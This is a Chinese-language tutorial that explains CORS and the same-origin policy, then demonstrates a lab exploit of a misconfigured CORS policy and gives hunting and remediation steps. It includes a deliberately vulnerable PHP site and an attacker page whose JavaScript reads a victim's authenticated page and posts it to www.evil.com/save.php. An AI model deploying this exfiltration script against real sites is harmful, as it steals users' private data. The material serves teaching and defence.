目录
跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。既然是跨域,那就先说说不跨域吧即同源策略
同源策略
SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。
浏览器的同源策略规定:不同域的客户端脚本在没有明确授权的情况下,不能读写对方的资源。那么何为同源呢,即两个站点需要满足同协议,同域名,同端口这三个条件。
SOP是一个很好的策略,但是随着Web应用的发展,网站由于自身业务的需求,需要实现一些跨域的功能,能够让不同域的页面之间能够相互访问各自页面的内容。那什么是跨域了,跨域是指跨域名的访问,以下情况都属于跨域:
跨域原因说明 | 示例 |
---|---|
域名不同 | www.jd.com 与 www.taobao.com |
域名相同,端口不同 | www.jd.com:8080 与 www.jd.com:8081 |
二级域名不同 | item.jd.com 与 miaosha.jd.com |
如果域名和端口都相同,但是请求路径不同,不属于跨域,如:
www.jd.com/item
www.jd.com/goods
跨域访问的一些场景
1.比如后端开发完一部分业务代码后,提供接口给前端用,在前后端分离的模式下,前后端的域名是不一致的,此时就会发生跨域访问的问题。
2.程序员在本地做开发,本地的文件夹并不是在一个域下面,当一个文件需要发送ajax请求,请求另外一个页面的内容的时候,就会跨域。
3.电商网站想通过用户浏览器加载第三方快递网站的物流信息。
4.子站域名希望调用主站域名的用户资料接口,并将数据显示出来。
跨域问题
跨域不一定会有跨域问题。因为跨域问题是浏览器对于ajax请求的一种安全限制:一个页面发起的ajax请求,只能是于当前页同域名的路径,这能有效的阻止跨站攻击。
因此:跨域问题 是针对ajax的一种限制
但是这却给我们的开发带来了不变,而且在实际生产环境中,肯定会有很多台服务器之间交互,地址和端口都可能不同,怎么办?
解决跨域问题的方案
- Jsonp
最早的解决方案,利用script标签可以跨域的原理实现。
限制:
需要服务的支持
只能发起GET请求
-
nginx反向代理
思路是:利用nginx反向代理把跨域为不跨域,支持各种请求方式
缺点:需要在nginx进行额外配置,语义不清晰
-
CORS
规范化的跨域请求解决方案,安全可靠。
优势:
- 在服务端进行控制是否允许跨域,可自定义规则
- 支持各种请求方式
缺点:
- 会产生额外的请求
我们这里会采用cors的跨域方案。
CORS
CORS,跨域资源共享(Cross-origin resource sharing),是H5提供的一种机制,它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制。
CORS需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能,IE浏览器不能低于IE10。
-
浏览器端:
目前,所有浏览器都支持该功能(IE10以下不行)。整个CORS通信过程,都是浏览器自动完成,不需要用户参与。
-
服务端:
CORS通信与AJAX没有任何差别,因此你不需要改变以前的业务逻辑。只不过,浏览器会在请求中携带一些头信息,我们需要以此判断是否运行其跨域,然后在响应头中加入一些信息即可。这一般通过过滤器完成即可。
CORS原理
浏览器会将ajax请求分为两类,其处理方案略有差异:简单请求、特殊请求。
简单请求
只要同时满足以下两大条件,就属于简单请求。:
(1) 请求方法是以下三种方法之一:
- HEAD
- GET
- POST
(2)HTTP的头信息不超出以下几种字段:
- Accept
- Accept-Language
- Content-Language
- Last-Event-ID
- Content-Type:只限于三个值
application/x-www-form-urlencoded
、multipart/form-data
、text/plain
当浏览器发现ajax请求是简单请求时,会在请求头中携带一个字段:Origin
.
Origin中会指出当前请求属于哪个域(协议+域名+端口)。服务器会根据这个值决定是否允许其跨域。
Access-Control-Allow-Origin: http://xxxx.com
Access-Control-Allow-Credentials: true
Content-Type: text/html; charset=utf-8
- Access-Control-Allow-Origin:可接受的域,是一个具体域名或者*,代表任意
- Access-Control-Allow-Credentials:是否允许携带cookie,默认情况下,cors不会携带cookie,除非这个值是true
注意:
如果跨域请求要想操作cookie,需要满足3个条件:
- 服务的响应头中需要携带Access-Control-Allow-Credentials并且为true。
- 浏览器发起ajax需要指定withCredentials 为true
- 响应头中的Access-Control-Allow-Origin一定不能为*,必须是指定的域名
特殊请求
不符合简单请求的条件,会被浏览器判定为特殊请求,,例如请求方式为PUT。
预检请求
特殊请求会在正式通信之前,增加一次HTTP查询请求,称为"预检"请求(preflight)。
浏览器先询问服务器,当前网页所在的域名是否在服务器的许可名单之中,以及可以使用哪些HTTP动词和头信息字段。只有得到肯定答复,浏览器才会发出正式的XMLHttpRequest
请求,否则就报错。
一个“预检”请求的样板:
OPTIONS /cors HTTP/1.1
Origin: http://manage.leyou.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-Custom-Header
Host: api.leyou.com
Accept-Language: en-US
Connection: keep-alive
User-Agent: Mozilla/5.0...
与简单请求相比,除了Origin以外,多了两个头:
- Access-Control-Request-Method:接下来会用到的请求方式,比如PUT
- Access-Control-Request-Headers:会额外用到的头信息
服务器对预检请求的响应
服务收到预检请求,如果许可跨域,会发出响应:
HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2.0.61 (Unix)
Access-Control-Allow-Origin: http://manage.leyou.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: X-Custom-Header
Access-Control-Max-Age: 1728000
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/plain
除了Access-Control-Allow-Origin
和Access-Control-Allow-Credentials
以外,这里又额外多出3个头:
- Access-Control-Allow-Methods:允许访问的方式
- Access-Control-Allow-Headers:允许携带的头
- Access-Control-Max-Age:本次许可的有效时长,单位是秒,过期之前的ajax请求就无需再次进行预检了
如果浏览器得到上述响应,则认定为可以跨域,后续就跟简单请求的处理是一样的了。
CORS漏洞攻击流程
知道原理之后,我们看看CORS跨域导致用户信息泄漏是如何发生的
- 假设用户登陆一个含有CORS配置网站vuln.com,同时又访问了攻击者提供的一个链接evil.com。
- evil.com的网站向vuln.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于vuln.com的配置。
- 如果vuln.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收,否则浏览器会因为同源策略而不接收。
CORS漏洞案例演示
要想真正的清楚漏洞的原理,必须通过实验来理解!下面通过简单的代码来演示这个漏洞的发生过程。
192.168.43.52 www.vuln.com 存在cors漏洞的网站
192.168.110.129 www.eval.com hacker接收受害者网站cookie的站点
我们知道cookie设置httponly属性后,没办法被js读取,关于httponly传送门-》XSS漏洞获取cookie,我们把phpinfo页面当成是www.vlun.com上的用户信息。 模拟用户登陆www.vuln.com/login.php,登录成功后跳转到www.vuln.com/secrect.php。
1. www.vuln.com ,存在cors漏洞的网站搭建
- login.php 登录页面
- check.php 判断是否成功登陆的页面,成功登陆后返回cookie
- secret.php 登录成功后进入的页面,即用户的敏感信息所在页面
login.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>欢迎来到完美世界,请先进行登陆</title>
</head>
<body>
<form action="check.php" method="post">
用户名:<input type="text" name="name2">
密码: <input type="password" name="pass2">
<input type="submit" value="登录">
</form>
</body>
</html>
check.php
成功登陆后返回带有有httponly属性的cookie
<?php
header("Content-type:text/html;charset=utf-8"); #解决php中中文乱码问题
$a = "THISISSESSID20180802";
$b = "THISISSESSIDhttponly20180802";
if(!isset($_COOKIE['SESSIONid']) and !isset($_COOKIE['test_http'])){ #如果没有携带cookie则说明没有登陆,进入如下
echo "<br/>";
if(empty($_POST)){ #如果没有点击提交
echo "<a href='index.php'>请先登录系统</a>";
}else{ #否则的话说明进行了提交
$name = $_POST["name2"];
$pass = $_POST["pass2"];
if($name == "admin" && $pass == "123456"){ #如果帐号密码正确则返回自定义cookie值
echo "用户名密码正确";
#setcookie("SESSIONid",$a,0,"","",0); //设置普通Cookie
setcookie("SESSIONid",$a,0,"","",0,1);//设置HttpOnly Cookie
#setcoookie第三个值为0时,代表浏览器退出则cookie失效,第七个值代表是否设置httponly,值为1时代表设置
header("Location: secret.php"); #直接进行一个跳转
}else{
echo "用户名或密码错误";
echo "<a href='index.php'>请登录</a>";
}
}
}else{
header("Location: secret.php");
}
?>
secret.php
现在前两行代码是注释掉的
<?php
header("Content-type:text/html;charset=utf-8");
if(!isset($_COOKIE['SESSIONid'])){ #如果直接访问这个则拒绝
echo "<br/>";
echo "<a href='index.php'>请先登录系统</a>";
}else{
//header("Access-Control-Allow-Origin:http://192.168.110.129");
//header("Access-Control-Allow-Credentials:true");
phpinfo();
}
?>
受害者正常登录了www.vuln.com网站
2. 受害者登录网站后,不小心点击了恶意网站www.eval.com/CORS/steal.html链接
该代码
- 首先向黑客自己的站点http://www.eval.com/CORS/steal.html发起请求
- 接着steal.html向受害者的www.vuln.php网站发起ajax请求,请求http://www.vuln.com/CORS/secret.php页面
- 最后再请求http://www.eval.com/CORS/save.php将secret.php中的页面信息进行保存到hacker自己的服务器中
<!DOCTYPE>
<html>
<h1>Hello I evil page. </h1>
<script type="text/javascript">
function loadXMLDoc()
{
var xhr1;
var xhr2;
if(window.XMLHttpRequest)
{
xhr1 = new XMLHttpRequest();
xhr2 = new XMLHttpRequest();
}
else
{
xhr1 = new ActiveXObject("Microsoft.XMLHTTP");
xhr2= new ActiveXObject("Microsoft.XMLHTTP");
}
xhr1.onreadystatechange=function()
{
if(xhr1.readyState == 4 && xhr1.status == 200) //if receive xhr1 response
{
var datas=xhr1.responseText;
xhr2.open("POST","http://www.evil.com/save.php","true");
xhr2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr2.send("T1="+escape(datas));
}
}
xhr1.open("GET","http://www.vuln.com/CORS/secret.php","true") //request user page.
xhr1.withCredentials = true; //request with cookie
xhr1.send();
}
loadXMLDoc();
</script>
</html>
然后访问 http://www.eval.com/CORS/steal.html ,由于请求是从www.evil.com发出的,通过AJAX请求www.vuln.com的资源,所以,浏览器自动为我们加上了Origin这个字段。
而且我们可以发现,www.vuln.com/secrect.php这个请求其实是有返回内容的。
3. 浏览器进行跨域拦截
但是到了浏览器这边,却没有继续请求将返回的内容发送到www.evil.com/CORS/save.php,是因为浏览器拦截了该请求,提示没有CORS的头Access-Control-Allow-Origin。
4. 允许跨域请求
去除www.vuln.com/secrect.php的注释
<?php
header("Content-type:text/html;charset=utf-8");
if(!isset($_COOKIE['SESSIONid'])){ #如果直接访问这个则拒绝
echo "<br/>";
echo "<a href='index.php'>请先登录系统</a>";
}else{
header("Access-Control-Allow-Origin:http://www.evil.com");
header("Access-Control-Allow-Credentials:true");
phpinfo();
}
?>
抓包发现请求www.vuln.com/CORS/secrect.php发现了对应的响应头。Access-Control-Allow-Origin指是允许访问的源,Access-Control-Allow-Credentials指的是允许带上cookie访问资源。这样浏览器就不会出错而拦截请求了,然后接着把受害则登录后的信息发送到www.evil.com/CORS/save.php去。
save.php将接受到的信息保存在secret.html中,漏洞利用成功
思考:
如果我们将代码secrect.php代码中的修改成别的域名了,如下
header("Access-Control-Allow-Origin:https://www.baidu.com");
我们再次请求,发现浏览器提示同源策略禁止读取位于 http://www.vuln.com/CORS/secret.php 的远程资源。(原因:CORS 头 'Access-Control-Allow-Origin' 不匹配,即漏洞服务器允许被请求的源服务器为baidu.com,而这里的origin为eval.com,不在所允许的范围内,所以拒绝将信息发送到hacker的服务器上。
要是我将如下改为*了, * 表示该资源谁都可以用
header("Access-Control-Allow-Origin:*");
在文章上面说了
所以再次尝漏洞试利用,漏洞依然利用不成功
将Access-Control-Allow-Origin设置为*不是允许任意源访问吗为什么还是会产生跨域问题了?
原因:在CORS中,Credential不接受http响应首部中的‘Access-Control-Allow-Origin’设置为通配符‘*’。这与使用credentials相悖。
CORS漏洞挖掘思考
我们平时该怎么去挖掘这种漏洞了?可以分两步
1. 查看响应头
查看ACAO响应头是否为具体的值以及ACAC响应头是否为true,如果是则判断是否对源进行限制
Access-Control-Allow-Origin: http://www.eval.com
Access-Control-Allow-Credentials: true
2. 判断是否对源进行限制
我们将origin修改为任意的站定,查看返回的ACAO头是否变成和我们修改成的站点一样,如果是,则可能存在CORS跨域资源共享。如下修改为baidu,ACAO也变为baidu,可能存在跨域问题。
3. 判断是否对Referer值进行校验,或者是否添加token
如下站点,上面说的那两个判断条件都成立,去除referer字段也没问题,但是这里存在token值
当我们把token值去掉时,显示登录过期,所以此cors漏洞无法利用
漏洞危害
经过上面的实验,我们知道如果一个页面存在cors漏洞那么可能:
1 . 敏感信息泄露
站点存在CORS共享问题,那么如果内部网络用户访问了恶意站点,恶意站点可以通过跨域请求来获取到内部站点的信息及cookie等凭证信息
漏洞修复
CORS漏洞主要是由于配置错误而引起的,可以配置Access-Control-Allow-Origin标头中指定的来源为受信任的站点